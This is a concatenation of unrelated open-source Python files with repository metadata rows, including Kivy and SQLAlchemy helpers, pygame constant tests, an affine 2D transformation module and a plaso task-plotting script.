        return ProgressIndicators._pi[name]

    @staticmethod
    def setIndicator(name, indicator):
        """Register indicator under name."""
        ProgressIndicators._pi[name].append(indicator)
class QueueProgressIndicator(object):
    """
    A class used by the UI to show the progress of the queue or a part of it.
    """

    def __init__(self, name, queueItemList):
        self.queueItemList = queueItemList
        self.name = name

    def numTotal(self):
        """Total number of tracked queue items."""
        return len(self.queueItemList)

    def numFinished(self):
        """Number of tracked items no longer in the queue."""
        return sum(1 for item in self.queueItemList if not item.is_in_queue())

    def numRemaining(self):
        """Number of tracked items still in the queue."""
        return sum(1 for item in self.queueItemList if item.is_in_queue())

    def nextName(self):
        """Name of the first current/queued item that is tracked here."""
        candidates = [sickbeard.showQueueScheduler.action.currentItem]
        candidates.extend(sickbeard.showQueueScheduler.action.queue)  # @UndefinedVariable
        for item in candidates:
            if item in self.queueItemList:
                return item.name
        return "Unknown"

    def percentComplete(self):
        """Integer 0-100 share of tracked items that have finished."""
        total = self.numTotal()
        if total == 0:
            return 0
        return int(float(self.numFinished()) / float(total) * 100)
class LoadingTVShow(object):
    """Placeholder for a show that is still being loaded from dir."""

    def __init__(self, dir):
        self.dir = dir
        # Populated with the real show object once loading finishes.
        self.show = None
| coderbone/SickRage-alt | sickbeard/ui.py | Python | gpl-3.0 | 5,666 |
import unittest
from tests.core.torrentclient_tests import TorrentClientTest
def suite():
    """Build the torrent-client test suite run by this script."""
    case_names = ['test_get_save_path']
    return unittest.TestSuite(TorrentClientTest(name) for name in case_names)
clientTestSuite = suite()

if __name__ == '__main__':
    # Actually run the explicit suite. The previous code called
    # unittest.TextTestRunner(clientTestSuite), which merely constructed a
    # runner with the suite as its output *stream* and never ran any test,
    # then fell through to unittest.main() which discovers nothing in this
    # module.
    unittest.TextTestRunner().run(clientTestSuite)
| marcosflp/torrents_and_subtitles_downloader | run_tests.py | Python | mit | 306 |
import unittest
import pygame.constants
class KmodTests(unittest.TestCase):
    """Checks that every keyboard-modifier (KMOD_*) constant exists as an int."""

    @classmethod
    def setUpClass(cls):
        # Modifier constants present in every supported SDL version.
        cls.constants = [
            'KMOD_NONE',
            'KMOD_LSHIFT',
            'KMOD_RSHIFT',
            'KMOD_LCTRL',
            'KMOD_RCTRL',
            'KMOD_LALT',
            'KMOD_RALT',
            'KMOD_LMETA',
            'KMOD_RMETA',
            'KMOD_NUM',
            'KMOD_CAPS',
            'KMOD_MODE',
            'KMOD_CTRL',
            'KMOD_SHIFT',
            'KMOD_ALT',
            'KMOD_META',
        ]
        # GUI ("windows key") modifiers only exist under SDL 2.
        if pygame.get_sdl_version()[0] >= 2:
            cls.constants += ['KMOD_LGUI', 'KMOD_RGUI', 'KMOD_GUI']

    def test_kmod_existence(self):
        for name in self.constants:
            self.assertTrue(hasattr(pygame.constants, name),
                            'missing constant {}'.format(name))

    def test_kmod_types(self):
        for name in self.constants:
            self.assertEqual(type(getattr(pygame.constants, name)), int)
class KeyConstantTests(unittest.TestCase):
    """Checks that a K_<letter> constant exists for every lowercase letter."""

    def test_letters(self):
        for code in range(ord('a'), ord('z') + 1):
            name = 'K_%s' % chr(code)
            self.assertTrue(hasattr(pygame.constants, name),
                            'missing constant: %s' % name)
################################################################################
if __name__ == '__main__':
unittest.main()
| mark-me/Pi-Jukebox | venv/Lib/site-packages/pygame/tests/constants_test.py | Python | agpl-3.0 | 1,445 |
# -*- coding: utf-8 -*-
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import as_declarative
import settings
def db_connect():
    """ Performs database connection using database settings from settings.py.

    :return: sqlalchemy engine instance
    """
    # return create_engine('sqlite:///images.db', echo=True)
    url_template = '{drivername}://{username}:{password}@{host}:{port}/{database}'
    db_url = url_template.format(**settings.DATABASES['sqlalchemy'])
    return create_engine(db_url)
engine = db_connect()
session_maker = sessionmaker()
@as_declarative()
class Base(object):
    """Declarative base for all models that also manages its own engine
    connection and session lifecycle via open()/close()."""

    def __init__(self):
        # NOTE(review): the connection and session opened here are closed
        # again immediately, so a freshly constructed instance has no live
        # session -- callers apparently must call open() first. Confirm
        # this open-then-close is intentional.
        self.conn = engine.connect()
        self.session = session_maker(bind=self.conn)
        self.close()

    def open(self):
        # Open a fresh connection and bind a new session to it.
        self.conn = engine.connect()
        self.session = session_maker(bind=self.conn)

    def close(self):
        # Release the session and connection held by this instance.
        self.session.close()
        self.conn.close()
        # NOTE(review): dispose() shuts down the *module-wide* engine's
        # whole connection pool, affecting every other Base instance --
        # verify this is really wanted on every close().
        engine.dispose()
| drewdru/AutoTags | vk_base/models/modelsHelper.py | Python | gpl-3.0 | 984 |
'''
Text PIL: Draw text with PIL
'''
__all__ = ('LabelPIL', )
try:
from PIL import Image, ImageFont, ImageDraw
except:
raise
from kivy.compat import text_type
from kivy.core.text import LabelBase
from kivy.core.image import ImageData
# used for fetching extends before creature image surface
default_font = ImageFont.load_default()
class LabelPIL(LabelBase):
    """Label provider that renders text through PIL's ImageDraw."""

    # Shared font cache, keyed by "<font name>.<font size>".
    _cache = {}

    def _select_font(self):
        """Return (and cache) the PIL truetype font for the current options."""
        size = int(self.options['font_size'])
        name = self.options['font_name_r']
        try:
            cache_key = '%s.%s' % (text_type(name), text_type(size))
        except UnicodeDecodeError:
            cache_key = '%s.%s' % (name, size)

        if cache_key not in self._cache:
            self._cache[cache_key] = ImageFont.truetype(name, size)
        return self._cache[cache_key]

    def get_extents(self, text):
        """Return the (width, height) of text in the current font."""
        return self._select_font().getsize(text)

    def get_cached_extents(self):
        """Return a callable measuring extents without re-selecting a font."""
        return self._select_font().getsize

    def _render_begin(self):
        # Fresh RGBA surface plus draw context sized to this label.
        self._pil_im = Image.new('RGBA', self._size)
        self._pil_draw = ImageDraw.Draw(self._pil_im)

    def _render_text(self, text, x, y):
        # Kivy colors are 0-1 floats; PIL wants 0-255 ints.
        fill = tuple(int(c * 255) for c in self.options['color'])
        self._pil_draw.text((int(x), int(y)),
                            text, font=self._select_font(), fill=fill)

    def _render_end(self):
        data = ImageData(self._size[0], self._size[1],
                         self._pil_im.mode.lower(), self._pil_im.tostring())
        del self._pil_im
        del self._pil_draw
        return data
| BillBillBillBill/Tickeys-linux | tickeys/kivy_32/kivy/core/text/text_pil.py | Python | mit | 1,686 |
"""
Contains class Affine2D for preforming affine transformation (general linear
transformation followed by translation) on points (vectors) in 2D.
# Author: Vladan Lucic (Max Planck Institute for Biochemistry)
# $Id: affine_2d.py 1311 2016-06-13 12:41:50Z vladan $
"""
__version__ = "$Revision: 1311 $"
import logging
import numpy
import scipy
import scipy.linalg as linalg
from points import Points
from affine import Affine
class Affine2D(Affine):
"""
Finds and preforms affine transformation (general linear transformation
followed by translation) on points (vectors) in 2D.
The transformation that transforms points x to points y has the following
form:
y = gl x + d
where:
gl = q s p m
Main methods:
- find: finds a transformation between two sets of points
- transform: transforms a (set of) point(s)
- inverse: calculates inverse transformation
- compose: composition of two transformations
Important attributes and properties (see formulas above):
- d: translation vector
- gl: general linear transformation matrix
- q: rotation matrix
- phi: rotational angle (radians)
- phiDeg: rotational angle (degrees)
- s: scaling matrix (diagonal)
- scale: vector of scaling parameters (diagonal of s)
- p: parity matrix (diagonal)
- parity: parity (+1 or -1)
- m: shear matrix (upper-triangular)
- error: error of transformation for all points
- rmsError: root mean square error of the transformation
"""
def __init__(self, d=None, gl=None, phi=None, scale=None,
parity=1, shear=0, order='qpsm', xy_axes='point_dim'):
"""
Initialization. Following argument combinations are valid:
- no arguments: no transformation matrices are initialized
- d and gl: d and gl are set
- d, phi and scale (parity and shear optional): d and gl
(gl = q p s m) are set
If arg d is None it is set to [0, 0]. If it is a single number it is
set to the same value in both directions.
If the arg xy_axes is 'point_dim' / 'dim_point', points used in this
instance should be specified as n_point x 2 / 2 x n_point
matrices.
Arguments
- gl: gl matrix
- phi: angle
- scale: single number or 1d array
- parity: 1 or -1
- shear: (number) shear
- d: single number, 1d array, or None (means 0)
- order: decomposition order
- xy_axes: order of axes in matrices representing points, can be
'point_dim' (default) or 'dim_point'
"""
# set d
if d is None:
d = 0
if not isinstance(d, (numpy.ndarray, list)):
d = self.makeD(d)
if (gl is not None) and (d is not None):
super(self.__class__, self).__init__(
gl, d, order=order, xy_axes=xy_axes)
elif (phi is not None) and (scale is not None) and (d is not None):
if not isinstance(scale, (numpy.ndarray, list)):
scale = self.makeS(scale)
elif isinstance(scale, numpy.adarray) and (len(scale.shape) == 1):
scale = self.makeS(scale)
elif isinstance(scale, list) and not isinstance(scale[0], list):
scale = self.makeS(scale)
qp = numpy.inner(self.makeQ(phi), self.makeP(parity))
sm = numpy.inner(scale, self.makeM(shear))
gl = numpy.inner(qp, sm)
super(self.__class__, self).__init__(
gl, d, order=order, xy_axes=xy_axes)
else:
raise ValueError("Transformation could not be created because "
+ " not enough parameters were specified.")
@classmethod
def downcast(cls, affine):
"""
Returns instance of this class that was obtained by dowoncasting
art affine (instance of Affine, base class of this class).
Argument:
- affine: instance of Affine
"""
# copy gl and d, obligatory
new = cls(gl=affine.gl, d=affine.d, xy_axes=affine.xy_axes)
# copy attributes that are not obligarory
for name in ['order', 'resids', 'rank', 'singular', 'error', '_xPrime',
'_yPrime', 'q', 'p', 's', 'm', 'xy_axes']:
try:
value = getattr(affine, name)
setattr(new, name, value)
except AttributeError:
pass
return new
##############################################################
#
# Parameters
#
@classmethod
def identity(cls, ndim=2):
"""
Returnes an identity object of this class, that is a transformation
that leaves all vectors invariant.
Argument ndim is ignored, it should be 2 here.
"""
obj = cls.__base__.identity(ndim=2)
return obj
@classmethod
def makeQ(cls, phi):
"""
Returns rotation matrix corresponding to angle phi
"""
q = numpy.array([[numpy.cos(phi), -numpy.sin(phi)],
[numpy.sin(phi), numpy.cos(phi)]])
return q
@classmethod
def getAngle(cls, q):
"""
Returns angle corresponding to the rotation matrix specified by arg q
"""
res = numpy.arctan2(q[1,0], q[0,0])
return res
@classmethod
def makeS(cls, scale):
"""
Returns scale transformation corresponding to 1D array scale.
Argument:
- scale: can be given as an 1d array (or a list), or as a single
number in which case the scale is the same in all directions
"""
s = cls.__base__.makeS(scale=scale, ndim=2)
return s
@classmethod
def makeP(cls, parity, axis=-1):
"""
Returns parity matrix corresponding to arg parity.
If parity is -1, the element of the parity matrix corresponding to
axis is set to -1 (all other are 1).
Arguments:
- parity: can be 1 or -1
- axis: axis denoting parity element that can be -1
"""
p = cls.__base__.makeP(parity=parity, axis=axis, ndim=2)
return p
@classmethod
def makeM(cls, shear):
"""
Returns share matrix corresponding to (arg) shear.
"""
m = numpy.array([[1, shear],
[0, 1]])
return m
@classmethod
def makeD(cls, d):
"""
Returns d (translation) array corresponding to arg parity.
Arguments:
- d: (single number) translation
"""
d = cls.__base__.makeD(d, ndim=2)
return d
def getPhi(self):
"""
Rotation angle of matrix self.q in radians.
"""
#try:
# qq = self.q
#except AttributeError:
# self.decompose(order='qpsm')
res = numpy.arctan2(self.q[1,0], self.q[0,0])
return res
def setPhi(self, phi):
"""
Sets transformation matrices related to phi (q and gl). Matrix gl is
calculated using the current values of other matrices (p, s and m).
"""
self.q = self.makeQ(phi)
try:
gg = self.gl
self.gl = self.composeGl()
except AttributeError:
pass
phi = property(fget=getPhi, fset=setPhi, doc='Rotation angle in radians')
def getPhiDeg(self):
"""
Rotation angle in degrees
"""
res = self.phi * 180 / numpy.pi
return res
def setPhiDeg(self, phi):
"""
Sets transformation matrices related to phi (q and gl). Matrix gl is
calculated using the current values of other matrices (p, s and m).
"""
phi_rad = phi * numpy.pi / 180
self.q = self.makeQ(phi_rad)
try:
gg = self.gl
self.gl = self.composeGl()
except AttributeError:
pass
phiDeg = property(fget=getPhiDeg, fset=setPhiDeg,
doc='Rotation angle in degrees')
def getUAngle(self):
"""
Returns angle alpha corresponding to rotation matrix self.u
"""
return self.getAngle(q=self.u)
def setUAngle(self, angle):
"""
Sets U matrix (as in usv decomposition) and adjusts gl.
"""
self.u = self.makeQ(angle)
self.gl = self.composeGl()
uAngle = property(fget=getUAngle, fset=setUAngle,
doc='Rotation angle corresponding to matrix U in radians')
def getUAngleDeg(self):
"""
Returns angle alpha corresponding to rotation matrix self.u
"""
res = self.getAngle(q=self.u) * 180 / numpy.pi
return res
def setUAngleDeg(self, angle):
"""
Sets U matrix (as in usv decomposition) and adjusts gl.
"""
angle_rad = angle * numpy.pi / 180
self.u = self.makeQ(angle_rad)
self.gl = self.composeGl()
uAngleDeg = property(fget=getUAngleDeg, fset=setUAngleDeg,
doc='Rotation angle corresponding to matrix U in degrees')
def getVAngle(self):
"""
Returns angle alpha corresponding to rotation matrix self.v
"""
return self.getAngle(q=self.v)
def setVAngle(self, angle):
"""
Sets V matrix (as in usv decomposition) and adjusts gl.
"""
self.v = self.makeQ(angle)
self.gl = self.composeGl()
vAngle = property(fget=getVAngle, fset=setVAngle,
doc='Rotation angle corresponding to matrix V in radians')
def getVAngleDeg(self):
"""
Returns angle alpha corresponding to rotation matrix self.v
"""
res = self.getAngle(q=self.v) * 180 / numpy.pi
return res
def setVAngleDeg(self, angle):
"""
Sets V matrix (as in usv decomposition) and adjusts gl.
"""
angle_rad = angle * numpy.pi / 180
self.v = self.makeQ(angle_rad)
self.gl = self.composeGl()
vAngleDeg = property(fget=getVAngleDeg, fset=setVAngleDeg,
doc='Rotation angle corresponding to matrix V in degrees')
def getScaleAngle(self):
"""
Returns angle (in rad) that corresponds to the scaling:
arccos(scale_smaller / scale_larger)
where scale_smaller and scale_larger are the smaller and larger scale
factors, respectively.
Rotation of an 2D object by this angle around x-axis in 3D is eqivalent
to scaling this object by self.scale (up to a common scale factor).
"""
ratio = self.scale[1] / self.scale[0]
if ratio > 1:
ratio = 1. / ratio
res = numpy.arccos(ratio)
return res
scaleAngle = property(
fget=getScaleAngle,
doc='Angle corresponding to the ratio of scales (in rad)')
def getScaleAngleDeg(self):
"""
Returns angle in degrees that corresponds to the scaling:
arccos(scale[1]/scale[0])
Rotation of an 2D object by this angle around x-axis in 3D is eqivalent
to scaling this object by self.scale (up to a common scale factor).
"""
return self.scaleAngle * 180 / numpy.pi
scaleAngleDeg = property(
fget=getScaleAngleDeg,
doc='Angle corresponding to the ratio of scales in degrees')
def getShear(self):
"""
Shear
"""
try:
mm = self.m
except AttributeError:
self.decompose()
res = self.m[0, 1]
return res
shear = property(fget=getShear, doc='Shear')
##############################################################
#
# Finding and applying transformations
#
@classmethod
def find(
cls, x, y, x_ref='cm', y_ref='cm', type_='gl', xy_axes='point_dim'):
"""
Finds affine transformation (general linear transformation folowed by a
translation) that minimizes square error for transforming points x to
points y in 2D. The transformation has the form
y = gl x + d, (1)
and:
gl = q s p m for type_='gl'
gl = S q p for type_='rs'
where d is translation vector, q, s, p and m are rotation, scaling,
parity and shear matrices, respectivly and S is a scalar scale (same
for both directions)
In the default mode (x_ref='cm' and y_ref='cm') the parameters are
calculated by minimizing square error to get gl from:
y - y_cm = gl (x - x_cm) and d = y_cm - gl x_cm
where x_cm and y_cm are the centers of mass for x and y respectivly.
In this case the square error of eq 1 is minimized
In case args x_ref and y_ref are coordinates, gl is determined by
minimizing square error in:
y - y_ref = gl (x - x_ref) and d = y_ref - gl x_ref
Note that in this case the parameters found do not minimize the error
of eq 1.
In case type_='gl', general linear transformation (matrix gl) is
calculated using Affine.find which in turn uses scipy.linalg.lstsq.
Alternatively, if type_='rs', rotation angle parity and scale are
calculated using findRS() method.
Arguments:
- x, y: sets of points, both having shape (n_points, n_dim)
- x_ref, y_ref: (ndarray) coordinates of reference points, or 'cm' to
use center of mass
Returns the transformation found as an instance of class cls, with
following attributes:
- gl: general linear transformation matrix
- d: translation vector
- q, p, s, m: rotation, parity, scale and shear matrices
- error: difference between y and transformed x values
- resids, rank, singular: values returned from scipy.linalg.lstsq
- _xPrime: x - x_ref
- _yPrime: y - y_ref
- type_: type of the optimization, 'gl' to find Gl transformation
that optimizes the square error, or 'rs' to find the best rotation
and one scale (currently implemented for 2D transformations only)
"""
if type_ == 'gl':
# run Affine.base and downcast
base_inst = cls.__base__.find(
x=x, y=y, x_ref=x_ref, y_ref=y_ref, xy_axes=xy_axes)
inst = cls.downcast(affine=base_inst)
elif type_ == 'rs':
# call special method for 'rs' type in 2D
inst = cls.findRS(
x=x, y=y, x_ref=x_ref, y_ref=y_ref, xy_axes=xy_axes)
else:
raise ValueError("Argument type_: ", type_, "was not ",
"understood. Valid values are 'gl', and 'rs'.")
return inst
@classmethod
def findRS(cls, x, y, x_ref='cm', y_ref='cm', xy_axes='point_dim'):
"""
Finds transformation consisting of rotation, single scale factor and
translation in 2D that minimizes square error for transforming points
x to points y. The transformation has the form
y = gl x + d, gl = S q p (1)
where d is translation vector, q and p are rotation and parity
matrices, respectivly and S is a scalar scale (same for both
directions)
In the default mode (x_ref='cm' and y_ref='cm') the parameters are
calculated by minimizing square error to get gl from:
y - y_cm = gl (x - x_cm) and d = y_cm - gl x_cm
where x_cm and y_cm are the centers of mass for x and y respectivly.
In this case the square error of eq 1 is minimized
In case args x_ref and y_ref are coordinates, gl is determined by
minimizing square error in:
y - y_ref = gl (x - x_ref) and d = y_ref - gl x_ref
Note that in this case the parameters found do not minimize the error
of eq 1.
In center of mass coordinates, scale and parity are calculated
directly using:
S = sqrt( det(yx) / det(xx) )
P = sign( det(yx) / det(xx) )
Rotation angle is calculated so that the square error is minimized:
tan(phi + pi/2) = tr(y p x) / tr(y r0 p x)
where:
r0 = 0 -1
1 0
Arguments:
- x, y: sets of points, both having shape (n_points, n_dim)
- x_ref, y_ref: (ndarray) coordinates of reference points, or 'cm' to
use center of mass
Returns the transformation found as an instance of class cls, with
following attributes:
- gl: general linear transformation matrix
- d: translation vector
- q, p, s, m: rotation, parity, scale and shear matrices
- error: difference between y and transformed x values
- resids, rank, singular: values returned from scipy.linalg.lstsq
Note: To be replaced by SVD based method
"""
# bring x and y to n_points x n_dim shape
if xy_axes == 'point_dim':
pass
elif xy_axes == 'dim_point':
x = x.transpose()
y = y.transpose()
else:
raise ValueError(
"Argument xy_axes was not understood. Possible values are: "
+ "'point_dim' and 'dim_point'.")
# bring x to reference frame
if isinstance(x_ref, str) and (x_ref == 'cm'):
x_ref = numpy.mean(x, axis=0)
elif isinstance(x_ref, (list, tuple, numpy.ndarray)):
pass
else:
raise ValueError(\
'Argument x_ref: ', x_ref, ' was not understood.',
" Allowed values are None, 'cm', or an array.")
x_prime = x - x_ref
# bring y to reference frame
if isinstance(y_ref, str) and (y_ref == 'cm'):
y_ref = numpy.mean(y, axis=0)
elif isinstance(y_ref, (list, tuple, numpy.ndarray)):
pass
else:
raise ValueError(\
'Argument y_ref: ', y_ref, ' was not understood.',
" Allowed values are None, 'cm', or an array.")
y_prime = y - y_ref
# find parity and scale
det_xy = linalg.det(numpy.dot(x_prime.transpose(), y_prime))
det_xx = linalg.det(numpy.dot(x_prime.transpose(), x_prime))
parity = numpy.sign(det_xy * det_xx)
scale = numpy.sqrt(parity * det_xy / float(det_xx))
p = numpy.array([[1, 0], [0, parity]])
s = numpy.diag([scale, scale])
# find phi
px = numpy.inner(x_prime, p)
ypx = (y_prime * px).sum()
s2 = numpy.array([[0, -1], [1, 0]])
ys2px = (numpy.dot(y_prime, s2) * px).sum()
phi = numpy.arctan2(-ypx, float(ys2px)) + numpy.pi / 2
# q (rotation matrix)
q = numpy.array([[numpy.cos(phi), -numpy.sin(phi)],
[numpy.sin(phi), numpy.cos(phi)]])
# check +pi ambiguity of phi
yqpx = (numpy.dot(y_prime, q) * numpy.inner(x_prime, p)).sum()
if yqpx < 0:
phi += numpy.pi
q = cls.getQ(phi)
# get gl and d and instantiate
gl = numpy.dot(numpy.dot(q, s), p)
d = y_ref - numpy.inner(x_ref, gl)
inst = cls(gl=gl, d=d)
inst.xy_axes = xy_axes
# get error
inst.error = y - inst.transform(x, xy_axes='point_dim')
if xy_axes == 'dim_point':
inst.error = inst.error.transpose()
# save transformations
inst.q = q
inst.s = s
inst.p = p
inst.m = numpy.identity(2)
#inst.gl = gl
return inst
def findConformal(cls, x, y, x_mask=None, y_mask=None, d=None):
"""
Work in progress
Finds conformal transformation (global scaling and rotation folowed by a
translation) that transforms points x to points y:
y = s q x + d
The scale and rotation angle are determined from averages of lengths and
angles respectivly, of vectors formed by x and y in respect to their
centers of mass.
The translation is calculated translation from:
d = y_cm - gl x_cm
where x_cm and y_cm are x and y centers of mass.
If d (translation) is given the transformation is determined using
given d.
Only the points that are not masked neither in x_mask nor in y_mask are
used.
Arguments:
- x, y: sets of points, both having shape (n_points, n_dim)
- x_mask, y_masks: masked (not used) points, vectors of length
n_points
- d: translation vector of length ndim
Returns an instance of the transformation found with following
attributes:
- gl: transformation matrix
- d: translation vector
"""
raise NotImplementedError("Sorry, this is still work in progress.")
# remove masked points
[x, y], mask = cls.removeMasked([x,y], [x_mask,y_mask])
# deal with mode
if d is None:
# bring x and y to cm frame
x_cm = numpy.mean(x, axis=0)
x_0 = x - x_cm
y_cm = numpy.mean(y, axis=0)
y_0 = y - y_cm
else:
x_0 = x
y_0 = y - d
# find scale
x_dist = Points(x_0).distance()
y_dist = Points(y_0).distance()
scale = (y_dist / x_dist).mean()
# find rotation
numpy.arctan2(y_0, x_0)
    def decompose(self, gl=None, order=None):
        """
        Decomposes gl using QR or singular value decomposition as follows:

          gl = q p s m (order 'qr' or 'qpsm')
          gl = p s m q (order 'rq' or 'psmq')
          gl = u p s v (order 'usv')

        where:
          - q, u, v: rotation matrix (orthogonal, with det +1)
          - p: parity matrix (diagonal, the element self.parity_axis can be +1
          or -1, other diagonal elements +1)
          - s: scale matrix, diagonal and >=0
          - m: shear matrix, upper triangular, all diagonal elements 1

        The order is determined by arg order; if arg order is None, self.order
        is used (by the base class decompose).

        In case of the singular value decomposition (order='usv'), the angle
        corresponding to rotation matrix U is set to be between -pi/2 and pi/2
        by adjustUV().

        Arguments:
          - gl: (ndarray) general linear transformation, or self.gl if None
          - order: decomposition order 'qpsm' (same as 'qr'), 'psmq' (same as
          'rq'), or 'usv'

        If arg gl is None, the matrices resulting from the decomposition are
        saved as attributes of this instance (q, p, s, m, or u, p, s, v).
        Returns the decomposed matrices only if gl is not None.
        """
        # figure out type of return
        # NOTE(review): `new` is computed but never used below; the return
        # behavior is actually decided by `decomp` being None or not.
        if gl is None:
            new = False
        else:
            new = True

        # decompose via the base class (uses self.order when order is None)
        decomp = super(self.__class__, self).decompose(gl=gl, order=order)

        # NOTE(review): this tests the *argument* order only; when order is
        # None but self.order == 'usv', the U/V adjustment is skipped --
        # confirm that is intended.
        if order == 'usv':

            # adjust u and v
            if decomp is None:
                # modify attributes of this instance
                self.adjustUV()
            else:
                # make another instance and modify attributes there
                # NOTE(review): this branch looks broken: given __init__'s
                # argument checks, self.__class__(order='usv') with no
                # gl/d/phi raises ValueError, and the adjusted
                # (u, p, s, v) held by `local` is never returned (the
                # method implicitly returns None here).
                local = self.__class__(order='usv')
                (local.u, local.p, local.s, local.v) = decomp
                local.adjustUV()

        else:
            # just return whatever super.decompose() did
            return decomp
    def adjustUV(self):
        """
        In case of the singular value decomposition (order='usv'), the angle
        corresponding to rotation matrix U is set to be between -pi/2 and pi/2.
        This is achieved by rotation of both U and V matrices by pi (if needed).

        If the angle corresponding to the rotation matrix U is already between
        -pi/2 and pi/2, doesn't do anything.
        """
        if (self.uAngle > numpy.pi / 2) or (self.uAngle < -numpy.pi / 2):

            # adjust u; the uAngle property setter also rebuilds self.gl
            self.uAngle += numpy.pi

            # adjust v; the vAngle property setter likewise rebuilds self.gl
            self.vAngle += numpy.pi

            # compose (should not decompose)
            # NOTE(review): possibly redundant -- the property setters above
            # already recomposed self.gl via composeGl(); confirm whether
            # the explicit order='usv' call differs from what they stored.
            self.gl = self.composeGl(order='usv')
| Splo0sh/3DCT | pyto/affine_2d.py | Python | gpl-3.0 | 24,972 |
#!/usr/bin/env python
import glob
import os
# Convert every Qt Designer .ui file into a Python module in ../kuraclient.
# Renamed loop variable (`file` shadows the Python 2 builtin) and switched to
# a parenthesized print that behaves identically on Python 2 and 3.
for ui_file in glob.glob("*.ui"):
    print("Processing %s" % ui_file)
    module_name = os.path.splitext(ui_file)[0]
    os.system("pyuic -x %s -o ../kuraclient/%s.py" % (ui_file, module_name))
| boudewijnrempt/kura | dialogs/convert.py | Python | bsd-2-clause | 209 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Script to plot tasks from profiling data.
This script requires the matplotlib and numpy Python modules.
"""
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import glob
import os
import sys
import numpy # pylint: disable=import-error
from matplotlib import pyplot # pylint: disable=import-error
class TaskMeasurements(object):
  """Measurements of a task.

  Attributes:
    completed_time (float): time when the task was completed by the foreman.
    created_time (float): time when the task was created by the foreman.
    merging_duration (float): time it took the foreman to merge the task.
    merging_time (float): time when the task was started to be merged by
        the foreman.
    pending_merge_time (float): time when the task was scheduled to be merged
        by the foreman.
    processed_time (float): time when the task was processed according to
        the foreman.
    processing_duration (float): time it took the worker to process the task.
    processing_time (float): time when the task started to be processed by
        the worker.
    scheduled_time (float): time when the task was scheduled onto the task
        queue by the foreman.
  """

  def __init__(self):
    """Initializes a task measurement."""
    super(TaskMeasurements, self).__init__()
    # All timestamps start as None and are filled in as status events are
    # read from the profiling CSV; durations are derived from pairs of them.
    self.completed_time = None
    self.created_time = None
    self.merging_duration = None
    self.merging_time = None
    self.pending_merge_time = None
    self.processed_time = None
    self.processing_duration = None
    self.processing_time = None
    self.scheduled_time = None
def Main():
  """The main program function.

  Reads the tasks-*.csv.gz profiling data from the profile directory and
  plots the duration the tasks spent in each status, either interactively
  or to an output file.

  Returns:
    bool: True if successful or False if not.
  """
  argument_parser = argparse.ArgumentParser(description=(
      'Plots memory usage from profiling data.'))

  argument_parser.add_argument(
      '--output', dest='output_file', type=str, help=(
          'path of the output file to write the graph to instead of using '
          'interactive mode. The output format deduced from the extension '
          'of the filename.'))

  argument_parser.add_argument(
      'profile_path', type=str, help=(
          'path to the directory containing the profiling data.'))

  options = argument_parser.parse_args()

  if not os.path.isdir(options.profile_path):
    print('No such directory: {0:s}'.format(options.profile_path))
    return False

  names = ['time', 'identifier', 'status']

  measurements = {}

  glob_expression = os.path.join(options.profile_path, 'tasks-*.csv.gz')
  for csv_file_name in glob.glob(glob_expression):
    data = numpy.genfromtxt(
        csv_file_name, delimiter='\t', dtype=None, encoding='utf-8',
        names=names, skip_header=1)

    # A file with a single data row yields a 0-d structured array that
    # cannot be iterated; normalize it to 1-d.
    data = numpy.atleast_1d(data)

    for time, identifier, status in data:
      if identifier not in measurements:
        measurements[identifier] = TaskMeasurements()

      task_measurement = measurements[identifier]
      if status == 'completed':
        task_measurement.completed_time = time
        task_measurement.merging_duration = time - task_measurement.merging_time
      elif status == 'created':
        task_measurement.created_time = time

      # TODO: add support for:
      # elif status == 'merge_on_hold':
      # elif status == 'merge_resumed':

      elif status == 'merge_started':
        task_measurement.merging_time = time
      elif status == 'pending_merge':
        task_measurement.pending_merge_time = time
      elif status == 'processed':
        task_measurement.processed_time = time
      elif status == 'processing_started':
        task_measurement.processing_time = time
      elif status == 'processing_completed':
        task_measurement.processing_duration = (
            time - task_measurement.processing_time)
      elif status == 'scheduled':
        task_measurement.scheduled_time = time

  before_pending_merge_duration = {}
  before_queued_duration = {}
  merging_duration = {}
  pending_merge_duration = {}
  processing_duration = {}
  queued_duration = {}

  # NOTE: the calculations below assume every task went through the full
  # created/scheduled/processing/pending_merge/merge cycle; a task with a
  # missing status event would raise TypeError on the None arithmetic.
  for task_measurement in measurements.values():
    before_pending_merge_duration[task_measurement.scheduled_time] = (
        task_measurement.pending_merge_time - (
            task_measurement.processing_time +
            task_measurement.processing_duration))

    before_queued_duration[task_measurement.scheduled_time] = (
        task_measurement.scheduled_time - task_measurement.created_time)

    merging_duration[task_measurement.merging_time] = (
        task_measurement.merging_duration)

    pending_merge_duration[task_measurement.processing_time] = (
        task_measurement.merging_time - task_measurement.pending_merge_time)

    processing_duration[task_measurement.processing_time] = (
        task_measurement.processing_duration)

    queued_duration[task_measurement.scheduled_time] = (
        task_measurement.processing_time - task_measurement.scheduled_time)

  # Plot only when profiling data was found. The previous check tested
  # "data.size", which references the glob-loop variable after the loop and
  # raises NameError when no tasks-*.csv.gz files matched (and only reflects
  # the last file read otherwise).
  if measurements:
    keys = sorted(before_pending_merge_duration.keys())
    values = [before_pending_merge_duration[key] for key in keys]
    pyplot.plot(keys, values, label='Before pending merge')

    keys = sorted(before_queued_duration.keys())
    values = [before_queued_duration[key] for key in keys]
    pyplot.plot(keys, values, label='Before queued')

    keys = sorted(merging_duration.keys())
    values = [merging_duration[key] for key in keys]
    pyplot.plot(keys, values, label='Merging')

    keys = sorted(pending_merge_duration.keys())
    values = [pending_merge_duration[key] for key in keys]
    pyplot.plot(keys, values, label='Pending merge')

    keys = sorted(processing_duration.keys())
    values = [processing_duration[key] for key in keys]
    pyplot.plot(keys, values, label='Processing')

    keys = sorted(queued_duration.keys())
    values = [queued_duration[key] for key in keys]
    pyplot.plot(keys, values, label='Queued')

  pyplot.title('Task status duration')

  pyplot.xlabel('Time')
  pyplot.xscale('linear')

  pyplot.ylabel('Duration')
  pyplot.yscale('linear')

  pyplot.legend()

  if options.output_file:
    pyplot.savefig(options.output_file)
  else:
    pyplot.show()

  return True
if __name__ == '__main__':
  # Exit status 0 on success, 1 on failure.
  sys.exit(0 if Main() else 1)
| rgayon/plaso | utils/plot_tasks.py | Python | apache-2.0 | 6,415 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
